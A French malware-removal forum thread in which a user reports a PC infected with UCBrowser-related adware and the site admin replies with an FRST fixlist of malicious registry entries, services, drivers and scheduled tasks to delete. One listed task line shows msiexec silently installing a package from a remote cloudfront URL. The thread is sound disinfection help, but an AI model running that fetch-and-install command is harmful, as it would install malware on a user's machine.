Pour demander de l'aide, vous devez vous créer un compte et vous connecter. Utilisez les boutons sociaux ci-dessous depuis ce lien : S'inscrire sur le forum
Plus d'informations : Comment demander de l’aide sur le forum

PC infecté par UCBrowser

Aide à la désinfection pour supprimer les virus, adwares, ransomwares, trojans.

Modérateurs : Mods Windows, Helper

nico__972
Messages : 1
Inscription : 18 févr. 2017 22:09

PC infecté par UCBrowser

Message par nico__972 »

Bonjour,

En installant un .rar qui paraissait" clean" , je pense que mon pc a été infecté car j'ai des pages internet qui s'affichent par inadvertance et des mots chinois pour zipper des fichiers.
Windows est infecté par UCBrowser.

J'ai effectué une dizaine de nettoyage avec AdwCleaner mais les menaces ne disparaissent pas et du coup, j'ai l'impression d’être dans une boucle sans fin

Pouvez-vous m'aider svp, je ne sais plus quoi faire ?

Ci-dessous les liens des diagnostiques FRST?

FRST.txt : http://pjjoint.malekal.com/files.php?id ... x7i8v12i14

addition.txt : http://pjjoint.malekal.com/files.php?id ... v8m10y10k7

Merci

Nicolas

Malekal_morte
Site Admin
Site Admin
Messages : 102842
Inscription : 10 sept. 2005 13:57
Contact :

Re: PC infecté par UCBrowser

Message par Malekal_morte »

Bonjour,

Cette correction doit impérativement être faites en mode sans échec.
Prépare le fichier fixlist.txt comme indiqué ci-dessous.
Voir cette page pour démarrer en mode sans échec selon ta version de Windows : comment démarrer en mode sans échec



Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :

Code : Tout sélectionner

CreateRestorePoint:
CloseProcesses:
 HKU\S-1-5-21-430760676-1060048368-4278375692-1000\...\Run: [H1JFdEO0nd] => C:\Program Files\U7XOXHJCH2\U7XOXHJCH.exe [442880 2017-02-18] () 
 HKU\S-1-5-21-430760676-1060048368-4278375692-1000\...\Run: [Z4RwXnRN0n] => C:\Program Files\A4QJG2XNBX\A4QJG2XNB.exe [442880 2017-02-18] () 
 HKU\S-1-5-21-430760676-1060048368-4278375692-1000\...\Run: [8kIq0n52c8] => C:\Program Files\XGMGG8BTM6\4JA3GB7DG.exe [442880 2017-02-18] () 
 HKU\S-1-5-21-430760676-1060048368-4278375692-1000\...\Run: [E4Uhyol2RH] => C:\Program Files (x86)\DiskP\UJ29M.exe  
 HKU\S-1-5-21-430760676-1060048368-4278375692-1000\...\Run: [1D6qe8xd7x] => C:\Program Files\NJ0ZIA70YS\X7EOYJ7QF.exe [442880 2017-02-18] () 
 HKU\S-1-5-21-430760676-1060048368-4278375692-1000\...\Run: [TT9OK6YdCD] => C:\Program Files\P0ZIZTNSRJ\P0ZIZTNSR.exe [442880 2017-02-18] () 
 HKU\S-1-5-21-430760676-1060048368-4278375692-1000\...\Run: [Nxrxq1Rc2a] => C:\Program Files\80XOJ39PW7\K7G6QJWI1.exe [442880 2017-02-18] () 
 HKLM\...\Providers\nh9lcr47: C:\Program Files (x86)\Vesoqerdidom Mapper\local64spl.dll [307712 2017-02-18] () 
 AppInit_DLLs: C:\ProgramData\Voyasollam\OzerHold.dll => C:\ProgramData\Voyasollam\OzerHold.dll [358912 2017-02-18] ()  
 AppInit_DLLs-x32: C:\ProgramData\Voyasollam\TempKix.dll => C:\ProgramData\Voyasollam\TempKix.dll [248320 2017-02-18] ()  
  ShellExecuteHooks: Pas de nom - {8C321F1C-F442-11E6-B2D8-64006A5CFC23} - C:\Program Files (x86)\Keoght\Mcoied.dll [146944 2017-02-18] ()  
  R2 UCBrowserSvc; C:\Program Files (x86)\UCBrowser\Application\UCService.exe [599440 2017-02-15] ()  
 S2 Voyasollam; C:\ProgramData\\Voyasollam\\Voyasollam.exe [982016 2017-02-18] () [Fichier non signé]  
 R2 gemeloki; C:\Program Files (x86)\be800dd9-f01e-4ed3-a2e4-1a03e313798b1487446692\protbe800dd9-f01e-4ed3-a2e4-1a03e313798b.tmpfs [X] 
 S2 serverss; C:\WINDOWS\Temp\184.tmp [X]  
 R2 tiqutyhu; C:\Program Files (x86)\be800dd9-f01e-4ed3-a2e4-1a03e313798b1487446692\knsbe800dd9-f01e-4ed3-a2e4-1a03e313798b.tmpfs [X] 
 ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => C:\Program Files\¿ìѹ\X64\KZipShell.dll [2017-02-18] () 
 U1 NetUtils2016; C:\WINDOWS\system32\drivers\NetUtils2016.sys [909944 2017-02-18] () <==== ATTENTION  
 U1 ucdrv; C:\Program Files (x86)\UCBrowser\Security:ucdrv-x64.sys [25444 ] (UC Web Inc.) <==== ATTENTION 
2017-02-18 23:34 - 2017-02-18 23:34 - 00003476 _____ C:\WINDOWS\System32\Tasks\UCBrowserSecureUpdater 
 2017-02-18 23:10 - 2017-02-18 23:10 - 00000000 ____D C:\Users\nicolas\AppData\Roaming\Ckuvuingqazepy 
2017-02-18 22:33 - 2017-02-18 22:46 - 00000000 ____D C:\Program Files (x86)\nI24kU2Thg 
 2017-02-18 22:33 - 2017-02-18 22:33 - 00909944 _____ C:\WINDOWS\system32\Drivers\NetUtils2016.sys  
 2017-02-18 22:33 - 2017-02-18 22:33 - 00000000 ____H C:\WINDOWS\system32\BIT7855.tmp  
 2017-02-18 22:33 - 2017-02-18 22:33 - 00000000 ____H C:\WINDOWS\system32\BIT7585.tmp  
 2017-02-18 22:33 - 2017-02-18 22:33 - 00000000 ____D C:\WINDOWS\system32\sstmp 
 2017-02-18 20:53 - 2017-02-18 20:53 - 00000000 ____D C:\Program Files\80XOJ39PW7 
 2017-02-18 20:51 - 2017-02-18 20:51 - 00000000 ____D C:\Program Files (x86)\Miqoshzesetion 
 2017-02-18 20:49 - 2017-02-18 20:49 - 00000000 ____D C:\Program Files\P0ZIZTNSRJ 
 2017-02-18 20:47 - 2017-02-18 22:35 - 00000000 ____D C:\WINDOWS\Minidump  
 2017-02-18 20:43 - 2017-02-18 20:43 - 00000000 ____D C:\Users\nicolas\AppData\Local\UCBrowser 
 2017-02-18 20:42 - 2017-02-18 20:42 - 00003326 _____ C:\WINDOWS\System32\Tasks\psv_Tipex 
 2017-02-18 20:42 - 2017-02-18 20:42 - 00003326 _____ C:\WINDOWS\System32\Tasks\psv_JobDomfax 
 2017-02-18 20:42 - 2017-02-18 20:42 - 00003322 _____ C:\WINDOWS\System32\Tasks\psv_Touchtax 
 2017-02-18 20:41 - 2017-02-18 20:55 - 00000000 ____D C:\Users\nicolas\AppData\Local\Reodeght 
 2017-02-18 20:40 - 2017-02-18 20:40 - 00000000 ____D C:\Program Files\NJ0ZIA70YS 
 2017-02-18 20:39 - 2017-02-18 20:43 - 00000000 ____D C:\Program Files (x86)\UCBrowser 
 2017-02-18 20:39 - 2017-02-18 20:40 - 00000000 ____D C:\ProgramData\Voyasollams 
 2017-02-18 20:38 - 2017-02-18 22:55 - 00000000 ____D C:\ProgramData\Voyasollam 
 2017-02-18 20:38 - 2017-02-18 22:45 - 00000000 ____D C:\WINDOWS\system32\SSL 
 2017-02-18 20:38 - 2017-02-18 20:38 - 00000000 ____D C:\Program Files (x86)\be800dd9-f01e-4ed3-a2e4-1a03e313798b1487446692 
 2017-02-18 20:37 - 2017-02-18 20:37 - 00000000 ____D C:\Program Files (x86)\wY6SJHmeSk 
 2017-02-18 20:36 - 2017-02-18 20:43 - 00000000 ____D C:\Users\nicolas\AppData\Local\Athtainfertither 
 2017-02-18 20:36 - 2017-02-18 20:38 - 00000000 ____D C:\Program Files (x86)\Keoght 
 2017-02-18 20:36 - 2017-02-18 20:36 - 00006134 _____ C:\WINDOWS\System32\Tasks\Vesoqerdidom Mapper 
 2017-02-18 20:36 - 2017-02-18 20:36 - 00005150 _____ C:\WINDOWS\System32\Tasks\Dehurycoersiward 
 2017-02-18 20:36 - 2017-02-18 20:36 - 00000000 ____D C:\Program Files\XGMGG8BTM6 
 2017-02-18 20:36 - 2017-02-18 20:36 - 00000000 ____D C:\Program Files\U7XOXHJCH2 
 2017-02-18 20:36 - 2017-02-18 20:36 - 00000000 ____D C:\Program Files\A4QJG2XNBX 
 2017-02-18 20:36 - 2017-02-18 20:36 - 00000000 ____D C:\Program Files (x86)\Vesoqerdidom Mapper 
 2017-02-17 16:56 - 2017-02-17 16:56 - 02956983 _____ C:\WINDOWS\b150b2abcfc017f96bf85f3b322417ea.exe  
Task: {60BAEECF-7F5D-443B-85DA-AB85564C7AE1} - System32\Tasks\Dehurycoersiward => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=ST2000DL003-9VT166_6YD0TXXMXXXX6YD0TXXM&v=2017218 /q
Task: {6B8E43C4-4E97-4AFB-ABC4-3634B9272080} - System32\Tasks\UCBrowserSecureUpdater => C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe [2017-02-18] (UC Web Inc.) <==== ATTENTION 
Task: {CA424112-6336-49D5-994B-FFB512C051AF} - System32\Tasks\SMW_UpdateTask_Time_333032333331383338362d7837235a576c4a3241345041 => Wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 <==== ATTENTION
 Hosts:
EmptyTemp:
RemoveProxy:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparait, copie/colle le contenu ici dans un nouveau message.


Redémarre l'ordinateur.


Enfin, pense à réinitialiser tes navigateurs:
==================================
Réinitialise/Répare les navigateurs WEB :
* réparer Mozilla Firefox (premier paragraphe)
* réparer Google Chrome (premier paragraphe)
* Réinitialiser et réparer Internet Explorer
Image

Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus

Les tutoriels Windows 10 du moment : Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.

Répondre

Revenir à « Supprimer/Desinfecter les virus (Trojan, Adwares, Ransomwares, Backdoor, Spywares) »